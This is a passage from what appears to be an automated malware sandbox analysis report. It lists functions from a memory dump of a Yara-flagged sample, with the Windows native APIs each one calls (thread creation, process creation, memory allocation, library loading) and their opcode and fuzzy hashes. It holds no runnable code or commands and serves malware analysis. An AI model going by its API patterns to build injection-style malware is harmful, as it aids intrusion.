                                                                          • Instruction ID: 44195af4cfcd7844dc5464a96f27935e8bb9154da72c22cdf586d036b66e8624
                                                                          • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                          • Instruction Fuzzy Hash: 8EF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158649BA1D97241DA30E8518BA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00418272, Relevance: 1.5, APIs: 1, Instructions: 35filenativeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • NtReadFile.NTDLL(?,?,FFFFFFFF,00413A11,?,?,?,?,00413A11,FFFFFFFF,?,R=A,?,00000000), ref: 004182B5
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileRead
                                                                          • String ID:
                                                                          • API String ID: 2738559852-0
                                                                          • Opcode ID: 5ff7f6d241f80774983b5d47d11df18d265765a86ed24d94cb357b65c5fea9f2
                                                                          • Instruction ID: 6f26a84ed9cee7b9b307b3f66eeb50f96d6269818b5e914aefad87f60d68ad55
                                                                          • Opcode Fuzzy Hash: 5ff7f6d241f80774983b5d47d11df18d265765a86ed24d94cb357b65c5fea9f2
                                                                          • Instruction Fuzzy Hash: 0BF0B7B2200108AFCB14DF99DC80EEB77A9EF9C354F158649FA1DD7241DA30E851CBA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004183A0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00402D11,00002000,00003000,00000004), ref: 004183D9
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateMemoryVirtual
                                                                          • String ID:
                                                                          • API String ID: 2167126740-0
                                                                          • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                          • Instruction ID: ed05b43336be2385218ce2c210938f1a749d46cd8ec257da0df7421e0e4bafff
                                                                          • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                          • Instruction Fuzzy Hash: BCF015B2200208ABCB14DF89DC81EEB77ADAF88754F118549FE0897241CA30F810CBA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 04629540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.478158487.00000000045C0000.00000040.00000001.sdmp, Offset: 045C0000, based on PE: true
                                                                          • Associated: 00000004.00000002.478615110.00000000046DB000.00000040.00000001.sdmp Download File
                                                                          • Associated: 00000004.00000002.478628676.00000000046DF000.00000040.00000001.sdmp Download File
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 3912e122e9ca5cf26189c92015915281ab78c4f3d3923ce1c23138c005263923
                                                                          • Instruction ID: 59c0ab611d385d335f342a588196d362395d878abf7e5b7a9b55f5c2114bda3e
                                                                          • Opcode Fuzzy Hash: 3912e122e9ca5cf26189c92015915281ab78c4f3d3923ce1c23138c005263923
                                                                          • Instruction Fuzzy Hash: 9F9002A5221040032105A9590705507004A97D5797751D021F1006550CE661D8716161
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 046295D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.478158487.00000000045C0000.00000040.00000001.sdmp, Offset: 045C0000, based on PE: true
                                                                          • Associated: 00000004.00000002.478615110.00000000046DB000.00000040.00000001.sdmp Download File
                                                                          • Associated: 00000004.00000002.478628676.00000000046DF000.00000040.00000001.sdmp Download File
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 6248f3a8b37d6593f106a8cbf26606c007128fd92025a425bc2ddf82c168ce73
                                                                          • Instruction ID: 65da4e856814bc4a28da92f95a934343d3bafaf1592cf85a02204c830259d1a0
                                                                          • Opcode Fuzzy Hash: 6248f3a8b37d6593f106a8cbf26606c007128fd92025a425bc2ddf82c168ce73
                                                                          • Instruction Fuzzy Hash: 679002E121204003610575594415616400E97E0647F51D021E1005590DD565D8A17165
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 04629660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.478158487.00000000045C0000.00000040.00000001.sdmp, Offset: 045C0000, based on PE: true
                                                                          • Associated: 00000004.00000002.478615110.00000000046DB000.00000040.00000001.sdmp Download File
                                                                          • Associated: 00000004.00000002.478628676.00000000046DF000.00000040.00000001.sdmp Download File
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: d8bac6d08056b527cde5206e23a4f45a2b5d9b83fec3a62d27254733b0034c56
                                                                          • Instruction ID: 2a1f9e91595a2d6a67ea8bcf527c4707fd96584fd538122c2f2857fdb3a8e249
                                                                          • Opcode Fuzzy Hash: d8bac6d08056b527cde5206e23a4f45a2b5d9b83fec3a62d27254733b0034c56
                                                                          • Instruction Fuzzy Hash: 7A9002B121104802F1807559440564A000997D1747F91D015A0016654DDA55DA6977E1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 04629650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.478158487.00000000045C0000.00000040.00000001.sdmp, Offset: 045C0000, based on PE: true
                                                                          • Associated: 00000004.00000002.478615110.00000000046DB000.00000040.00000001.sdmp Download File
                                                                          • Associated: 00000004.00000002.478628676.00000000046DF000.00000040.00000001.sdmp Download File
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 0231c2e7f2914564ce58c4658956c0a9609e0b78faee0e7e18bcaf924c6bfe6f
                                                                          • Instruction ID: 852210fb4198b4ef375d21b2748f76f2653b4e79503bccac501f32de7916b976
                                                                          • Opcode Fuzzy Hash: 0231c2e7f2914564ce58c4658956c0a9609e0b78faee0e7e18bcaf924c6bfe6f
                                                                          • Instruction Fuzzy Hash: 019002B121508842F14075594405A46001997D074BF51D011A0055694DA665DD65B6A1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 046296E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.478158487.00000000045C0000.00000040.00000001.sdmp, Offset: 045C0000, based on PE: true
                                                                          • Associated: 00000004.00000002.478615110.00000000046DB000.00000040.00000001.sdmp Download File
                                                                          • Associated: 00000004.00000002.478628676.00000000046DF000.00000040.00000001.sdmp Download File
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: a784817fe451f91f5d749efa9e9f4ee830feb215c12c3547e17643709b2e5820
                                                                          • Instruction ID: 37339e01bd96f14cf1ece8d5f5dcb7f31f18a19901c923379d9e16847cab6de6
                                                                          • Opcode Fuzzy Hash: a784817fe451f91f5d749efa9e9f4ee830feb215c12c3547e17643709b2e5820
                                                                          • Instruction Fuzzy Hash: 459002B12110C802F1106559840574A000997D0747F55D411A4415658D96D5D8A17161
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 046296D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.478158487.00000000045C0000.00000040.00000001.sdmp, Offset: 045C0000, based on PE: true
                                                                          • Associated: 00000004.00000002.478615110.00000000046DB000.00000040.00000001.sdmp Download File
                                                                          • Associated: 00000004.00000002.478628676.00000000046DF000.00000040.00000001.sdmp Download File
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 218e7ceae94ad7f93c952495f62b3d7ea52ceaa3bbc69cc77ae86d666f183582
                                                                          • Instruction ID: 5cafa21be8155f903edf76c12118fb577bacaf20b493d0a713195d34b86764b7
                                                                          • Opcode Fuzzy Hash: 218e7ceae94ad7f93c952495f62b3d7ea52ceaa3bbc69cc77ae86d666f183582
                                                                          • Instruction Fuzzy Hash: 019002B121104842F10065594405B46000997E0747F51D016A0115654D9655D8617561
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 04629710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.478158487.00000000045C0000.00000040.00000001.sdmp, Offset: 045C0000, based on PE: true
                                                                          • Associated: 00000004.00000002.478615110.00000000046DB000.00000040.00000001.sdmp Download File
                                                                          • Associated: 00000004.00000002.478628676.00000000046DF000.00000040.00000001.sdmp Download File
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 79cfdacde6bec1fe05c08021af708b27dce2ba3952419c6146a55fb6eb7fa8a9
                                                                          • Instruction ID: 55791d489d55beab4b59f7e097f0b378b7eed7b719c92b254d5713eb991e58af
                                                                          • Opcode Fuzzy Hash: 79cfdacde6bec1fe05c08021af708b27dce2ba3952419c6146a55fb6eb7fa8a9
                                                                          • Instruction Fuzzy Hash: 139002B121104402F10069995409646000997E0747F51E011A5015555ED6A5D8A17171
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 04629FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.478158487.00000000045C0000.00000040.00000001.sdmp, Offset: 045C0000, based on PE: true
                                                                          • Associated: 00000004.00000002.478615110.00000000046DB000.00000040.00000001.sdmp Download File
                                                                          • Associated: 00000004.00000002.478628676.00000000046DF000.00000040.00000001.sdmp Download File
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 57757f1773d55c46126977e8a754a18d3ac10f8d82005936df6a37465e45adf8
                                                                          • Instruction ID: f0325f22ac9860d5960db4aa391410d101146be8f29e0857cff0efe65ecff1ed
                                                                          • Opcode Fuzzy Hash: 57757f1773d55c46126977e8a754a18d3ac10f8d82005936df6a37465e45adf8
                                                                          • Instruction Fuzzy Hash: 389002B132118402F11065598405706000997D1647F51D411A0815558D96D5D8A17162
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 04629780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.478158487.00000000045C0000.00000040.00000001.sdmp, Offset: 045C0000, based on PE: true
                                                                          • Associated: 00000004.00000002.478615110.00000000046DB000.00000040.00000001.sdmp Download File
                                                                          • Associated: 00000004.00000002.478628676.00000000046DF000.00000040.00000001.sdmp Download File
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: d4720905802f302d3dade558922ee68c2156ac22aa678b77b95d4e7be91e5c54
                                                                          • Instruction ID: cf6653ff5640415808d048635662a8643011f9cb8343b2772910c7bc23c5d150
                                                                          • Opcode Fuzzy Hash: d4720905802f302d3dade558922ee68c2156ac22aa678b77b95d4e7be91e5c54
                                                                          • Instruction Fuzzy Hash: FD9002A922304002F1807559540960A000997D1647F91E415A0006558CD955D8796361
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 04629860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.478158487.00000000045C0000.00000040.00000001.sdmp, Offset: 045C0000, based on PE: true
                                                                          • Associated: 00000004.00000002.478615110.00000000046DB000.00000040.00000001.sdmp Download File
                                                                          • Associated: 00000004.00000002.478628676.00000000046DF000.00000040.00000001.sdmp Download File
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 828354f830257b343dd96f14ff15578c8506c6722b9368fe6d92f1367079d336
                                                                          • Instruction ID: 4c36bacefce5ac28f985447ac7c45ad112a257c28a863fe481c1cafdaf86f291
                                                                          • Opcode Fuzzy Hash: 828354f830257b343dd96f14ff15578c8506c6722b9368fe6d92f1367079d336
                                                                          • Instruction Fuzzy Hash: 709002B121104413F11165594505707000D97D0687F91D412A0415558DA696D962B161
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 04629840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.478158487.00000000045C0000.00000040.00000001.sdmp, Offset: 045C0000, based on PE: true
                                                                          • Associated: 00000004.00000002.478615110.00000000046DB000.00000040.00000001.sdmp Download File
                                                                          • Associated: 00000004.00000002.478628676.00000000046DF000.00000040.00000001.sdmp Download File
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 1a3d0e1d0a3e162e8a01e91249e21fe8db57ba38ecfaad1ebce2cca3c9178bcc
                                                                          • Instruction ID: 4956ab1b5c8cdc4efc1869a3b7a95897f9e717bd0d404ce847cc88ad5978d1a3
                                                                          • Opcode Fuzzy Hash: 1a3d0e1d0a3e162e8a01e91249e21fe8db57ba38ecfaad1ebce2cca3c9178bcc
                                                                          • Instruction Fuzzy Hash: EC9002A1252081527545B5594405507400AA7E0687B91D012A1405950C9566E866E661
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 04629910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.478158487.00000000045C0000.00000040.00000001.sdmp, Offset: 045C0000, based on PE: true
                                                                          • Associated: 00000004.00000002.478615110.00000000046DB000.00000040.00000001.sdmp Download File
                                                                          • Associated: 00000004.00000002.478628676.00000000046DF000.00000040.00000001.sdmp Download File
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: ef6a29a16e4c5417740650199ac7e22820996cd67042379fec475b6273c9473d
                                                                          • Instruction ID: 04a8b589be77d55808fb1cb49ec31c097b400c88dbcdddae7808b6678e2d1a8c
                                                                          • Opcode Fuzzy Hash: ef6a29a16e4c5417740650199ac7e22820996cd67042379fec475b6273c9473d
                                                                          • Instruction Fuzzy Hash: F49002F121104402F14075594405746000997D0747F51D011A5055554E9699DDE576A5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 046299A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.478158487.00000000045C0000.00000040.00000001.sdmp, Offset: 045C0000, based on PE: true
                                                                          • Associated: 00000004.00000002.478615110.00000000046DB000.00000040.00000001.sdmp Download File
                                                                          • Associated: 00000004.00000002.478628676.00000000046DF000.00000040.00000001.sdmp Download File
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 1c5ac0aa4c1bde2bafd15c407933c64f4a887f59043dcd09532901377f2861f8
                                                                          • Instruction ID: 3aafd3b176b985608d92c7cc22fb8be50ca40e4efb81cd14ddfb1250c2c762ed
                                                                          • Opcode Fuzzy Hash: 1c5ac0aa4c1bde2bafd15c407933c64f4a887f59043dcd09532901377f2861f8
                                                                          • Instruction Fuzzy Hash: EB9002E135104442F10065594415B060009D7E1747F51D015E1055554D9659DC627166
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 04629A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.478158487.00000000045C0000.00000040.00000001.sdmp, Offset: 045C0000, based on PE: true
                                                                          • Associated: 00000004.00000002.478615110.00000000046DB000.00000040.00000001.sdmp Download File
                                                                          • Associated: 00000004.00000002.478628676.00000000046DF000.00000040.00000001.sdmp Download File
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 98ec47ef56f374a8608a505e9312acd17ab3b251477c07bc768ecb4508ea4929
                                                                          • Instruction ID: 1b48262c0c24d3898e90e1ace0224c53f261669c176e49cb31037f9367fba854
                                                                          • Opcode Fuzzy Hash: 98ec47ef56f374a8608a505e9312acd17ab3b251477c07bc768ecb4508ea4929
                                                                          • Instruction Fuzzy Hash: FF9002A122184042F20069694C15B07000997D0747F51D115A0145554CD955D8716561
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00416EE0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • Sleep.KERNELBASE(000007D0), ref: 00416F88
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Sleep
                                                                          • String ID: net.dll$wininet.dll
                                                                          • API String ID: 3472027048-1269752229
                                                                          • Opcode ID: a12a8d8845f52a6374b7654c5684f76eba2860a5417c6425b9b4e870ec8aa73a
                                                                          • Instruction ID: f390af8b8c11f781ec7d9a350aaf589afc469f5b83d9769a5f77b792f8f092a7
                                                                          • Opcode Fuzzy Hash: a12a8d8845f52a6374b7654c5684f76eba2860a5417c6425b9b4e870ec8aa73a
                                                                          • Instruction Fuzzy Hash: 2931AFB1601304ABC711DF65D8A1FA7B7B8AB48704F00841EF61AAB241D774F986CBE4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00416ED6, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 83sleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • Sleep.KERNELBASE(000007D0), ref: 00416F88
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Sleep
                                                                          • String ID: net.dll$wininet.dll
                                                                          • API String ID: 3472027048-1269752229
                                                                          • Opcode ID: ab85c865195801190fb0fa97fa2da08348f03e331522e7d1c6e79531713775f8
                                                                          • Instruction ID: 555fb8e4d673b83352529fa7b85178f543cd7881808703a3302e5c0e0879d347
                                                                          • Opcode Fuzzy Hash: ab85c865195801190fb0fa97fa2da08348f03e331522e7d1c6e79531713775f8
                                                                          • Instruction Fuzzy Hash: 3E31BFB1601300BBC710DF65D8A1FABB7B8AB48704F14806EF6196B241D774E996CBE9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004184C2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 38COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: .z`
                                                                          • API String ID: 0-1441809116
                                                                          • Opcode ID: 6842731990029c057971e6ca307babc9a96aa20a556c4078d30577f747065fcd
                                                                          • Instruction ID: 81d09adf5c81ef1f741ab8b7a9607e6be393085894e564b464267bffea62a691
                                                                          • Opcode Fuzzy Hash: 6842731990029c057971e6ca307babc9a96aa20a556c4078d30577f747065fcd
                                                                          • Instruction Fuzzy Hash: 25F027B9504300BFDB21CF249C81ED33B5AAF55308F12425FF85947742DA34D952CAB5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004184D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00403B93), ref: 004184FD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FreeHeap
                                                                          • String ID: .z`
                                                                          • API String ID: 3298025750-1441809116
                                                                          • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                          • Instruction ID: 0c1265b7fbf046cbfd36917309396888787f1b5b9f48543de1c0af89871077f5
                                                                          • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                          • Instruction Fuzzy Hash: 2EE01AB12002046BD714DF59DC45EA777ACAF88750F014559F90857241CA30E9108AB0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00407260, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 004072BA
                                                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 004072DB
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: MessagePostThread
                                                                          • String ID:
                                                                          • API String ID: 1836367815-0
                                                                          • Opcode ID: 8b955aa86635726f2346a9c8d52cc1bf7f5856a12dc46368d73d443070a20bca
                                                                          • Instruction ID: bbcd0b2e5740072d15388175686a93538b06234ac68ffc2b081785cbfc84dfa6
                                                                          • Opcode Fuzzy Hash: 8b955aa86635726f2346a9c8d52cc1bf7f5856a12dc46368d73d443070a20bca
                                                                          • Instruction Fuzzy Hash: 2B01D431A8022876E720A6959C03FFF772C9B00B54F05405EFF04BA1C2E6A87D0682EA
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00407234, Relevance: 3.0, APIs: 2, Instructions: 27threadwindowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 004072BA
                                                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 004072DB
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: MessagePostThread
                                                                          • String ID:
                                                                          • API String ID: 1836367815-0
                                                                          • Opcode ID: 418d67e843a6e20bcb8b61129cfa72bef4780f36b85954071ceb27b274388cd9
                                                                          • Instruction ID: 6da4f28ee51dfecb3d60f010f74f6e954b6275d5870eac05df03b05b21d7113b
                                                                          • Opcode Fuzzy Hash: 418d67e843a6e20bcb8b61129cfa72bef4780f36b85954071ceb27b274388cd9
                                                                          • Instruction Fuzzy Hash: FCE07D11E462142DD31251546C02EBF3B4897E2701F0004FFFD40D89C2D498041982F2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00409B13, Relevance: 1.6, APIs: 1, Instructions: 63libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B92
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Load
                                                                          • String ID:
                                                                          • API String ID: 2234796835-0
                                                                          • Opcode ID: 705dd8df07d37f28985bb3b578f2561076a027043ccd4215f214074c70ecb61f
                                                                          • Instruction ID: 47962a35b1496f828657aac512d805a3f2d84d81aaba07c8a432479da790b69c
                                                                          • Opcode Fuzzy Hash: 705dd8df07d37f28985bb3b578f2561076a027043ccd4215f214074c70ecb61f
                                                                          • Instruction Fuzzy Hash: 8C112775E041496BCF10DBA4E842EEDB775AB54318F0441EAE90CE7283F936AE58CB45
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00409B20, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B92
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Load
                                                                          • String ID:
                                                                          • API String ID: 2234796835-0
                                                                          • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                          • Instruction ID: f6872c6640a97d379917802917a35d8835196bd2b620e753e6f67e56f73dccdd
                                                                          • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                          • Instruction Fuzzy Hash: EC0100B5D0010DBBDB10DAA5EC42FDEB778AB54318F0041A9A908A7281F635EA54C795
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00418540, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00418594
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateInternalProcess
                                                                          • String ID:
                                                                          • API String ID: 2186235152-0
                                                                          • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                          • Instruction ID: ccd65e455a6766b961bfcedf9323f9111758d35f24f5cf189e0879c04bc11aef
                                                                          • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                          • Instruction Fuzzy Hash: B5015FB2214208ABCB54DF89DC81EEB77ADAF8C754F158258FA0D97251DA30E851CBA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00417003, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0040CCD0,?,?), ref: 0041704C
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateThread
                                                                          • String ID:
                                                                          • API String ID: 2422867632-0
                                                                          • Opcode ID: 907bbf536192e76f2e01ca642cad2c15767a2f7a1b91c3a3f37b3dba141790fd
                                                                          • Instruction ID: 55a3383c7e87c3e304995f6b1a77f193f2df8272bdc8db4072c6e9c93498b7c1
                                                                          • Opcode Fuzzy Hash: 907bbf536192e76f2e01ca642cad2c15767a2f7a1b91c3a3f37b3dba141790fd
                                                                          • Instruction Fuzzy Hash: D0F0E57379034036D3302A699C43FE77B988F56B10F18005AF689AB2C2C599B98243A9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00417010, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0040CCD0,?,?), ref: 0041704C
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateThread
                                                                          • String ID:
                                                                          • API String ID: 2422867632-0
                                                                          • Opcode ID: 095b0b520be20d85b9640018a1fec647bbd965483516bedb257205f626dfced0
